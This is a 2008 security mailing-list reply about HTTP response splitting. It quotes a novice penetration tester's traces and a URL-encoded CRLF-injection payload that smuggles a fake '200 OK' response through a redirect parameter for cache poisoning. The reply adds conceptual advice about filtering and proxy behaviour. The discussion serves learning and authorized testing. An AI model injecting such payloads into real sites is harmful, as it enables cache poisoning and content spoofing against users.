Re: Is there a HTTP Respone Splitting Flaw?

["Gleb Paharenko" <gpaharenko () gmail com>]

Hi.

Service is vulnerable to http splitting in case it does not filter
control characters in the output. Spitting can be utilized in several
attack vectors and cache poisoning it only one of them. When I've been
researching the article of Amit Klein, I was able to easily reproduce
cache poisoning with apache, however failed with squid. My advice is
to emulate attack in lab environment and then try it in the wild. BTW:
fresh squid has some protection patches against cache poisoning.
Headers can be normalized by the upstream proxy, so you should be
aware of it. You can also cross post you question to more specific
webappsec mailing list.






2008/4/29  <bin4ry () theknetgroup org>:
> Hi together,
>
>
>  i'm new to this community as well as to pen-testing. I'v already done some jobs for smaller companies and 
> it-infrastructures.
>
>
>  Now i have to pen-test a website. I need  to perform a black-box-test and i've already found some xss- and some 
> sql-injection-bugs which i've reported to the site admin.
>
>
>  Now i believe that there's a http response splitting flaw as well.
>
>
>  I found this suspicious ressource:
>
>
>
>
>  foo.bar/accept?dest=/xy/z
>
>
>
>
>
>
>  This looks like a redir-script, right? So this is what i get:
>
>
>
>
>  GET foo.bar/accept?dest=/xy/z HTTP/1.1
>
>  Host: foo.barUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
>
>  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>
>  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
>
>  Accept-Encoding: gzip,deflate
>
>  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>
>  Keep-Alive: 300
>
>  Pragma: no-cache
>
>  Proxy-Connection: keep-alive
>
>
>  HTTP/1.x 302 Moved Temporarily <<<<<< look suspicious
>
>  Via: A_PROXY
>
>  Connection: close
>
>  Proxy-Connection: close
>
>  Date: Fri, 25 Apr 2008 12:09:42 GMT
>
>  Location: foo.bar/xy/z <<<<<<<
>
>  Content-Type: text/html; charset=utf-8
>
>  Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
>
>  Cache-Control: no-cache, private
>
>  X-Runtime: 0.39293
>
>  X-Powered-By: Servlet/2.4 JSP/2.0
>
>  X-Cache: MISS from prx-deka-02.f.ddk
>
>  ----------------------------------------------------------
>
>  GET /xy/z HTTP/1.1 <<<<< thats it, right?
>
>  Host: foo.bar
>
>  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
>
>  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>
>  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
>
>  Accept-Encoding: gzip,deflate
>
>  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>
>  Keep-Alive: 300
>
>  Proxy-Connection: keep-alive
>
>  If-None-Match: "e7346ba9885de32fe8d51358b8a409af"
>
>
>  HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy
>
>  Via: A_PROXY
>
>  Date: Fri, 25 Apr 2008 12:09:42 GMT
>
>  Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
>
>  Etag: "e7346ba9885de32fe8d51358b8a409af"
>
>  Cache-Control: private, max-age=0, must-revalidate, private
>
>  X-Cache: MISS from A_PROXY
>
>
>
>  Till now evrything looks like a response splitting flaw. Thats why i pass this one to $dest:
>
>
>
>
>  
> /xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E
>
>
>  Which is:
>
>
>  /xy/z
>
>
>  HTTP/1.1 200 OK
>
>  Content-Type: text/html
>
>  Pragma: no-cache
>
>  Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT
>
>  Content-Length: 36
>
>  <html>HTTP Response Splitting</html>
>
>
>
>
>  So, again our http traffic now with a injected http header:
>
>
>
>
>
>  GET 
> /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E
>  HTTP/1.1
>
>  Host: foo.bar
>
>  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
>
>  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>
>  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
>
>  Accept-Encoding: gzip,deflate
>
>  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>
>  Keep-Alive: 300
>
>  Pragma: no-cache
>
>  Proxy-Connection: keep-alive
>
>
>  HTTP/1.x 302 Moved Temporarily
>
>  Via: A_PROXY
>
>  Connection: close
>
>  Proxy-Connection: close
>
>  Date: Fri, 25 Apr 2008 12:07:47 GMT
>
>  Location: foo.bar/de/xy/z
>
>  Content-Type: text/html; charset=utf-8
>
>  Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
>
>  Cache-Control: no-cache, private
>
>  X-Powered-By: Servlet/2.4 JSP/2.0
>
>  X-Cache: MISS from A_PROXY
>
>  ----------------------------------------------------------
>
>  GET /xy/z HTTP/1.1
>
>  Host: foo.bar
>
>  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
>
>  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>
>  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
>
>  Accept-Encoding: gzip,deflate
>
>  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>
>  Keep-Alive: 300
>
>  Proxy-Connection: keep-alive
>
>  If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46"
>
>
>  HTTP/1.x 304 Not Modified
>
>  Via: 1.0 A_PROXY
>
>  Date: Fri, 25 Apr 2008 12:07:48 GMT
>
>  Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
>
>  Etag: "78ad90f3569fd7b31ad763f3f52e2c46"
>
>  Cache-Control: private, max-age=0, must-revalidate, private
>
>  X-Cache: MISS A_PROXY
>
>
>
>  As u can see, the injected header won't be matched to the http-request from the redir-script.
>
>
>  I tried several crlf-types: %0d%0a , %0a%0a and %0a but as we can see this is a linuxbox therefore %0d%0a should 
> work.
>
>
>  There's a squid between me and foo.bar. The whitepaper from sanctum sais that squid has a packet boundary approach 
> and messages are read as packets and therefore injected headers may need 2 be padded.
>
>
>  Someone can help me out?
>
>
>  Thx
>
>
>  P.S.: And another question. Since i am not really familiar with response splitting, i'd like to ask you whether the 
> risc of response splitting is always present when a script utilizes user-input to form a new address which is the 
> target of a rediriction script, which manifests in a http 302 header from the server?
>
>
>  Thanks and greetings to the community from germany.
>
>  ------------------------------------------------------------------------
>  This list is sponsored by: Cenzic
>
>  Need to secure your web apps NOW?
>  Cenzic finds more, "real" vulnerabilities fast.
>  Click to try it, buy it or download a solution FREE today!
>
>  http://www.cenzic.com/downloads
>  ------------------------------------------------------------------------



-- 
Best regards.
Gleb Pakharenko.
http://gpaharenko.livejournal.com

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------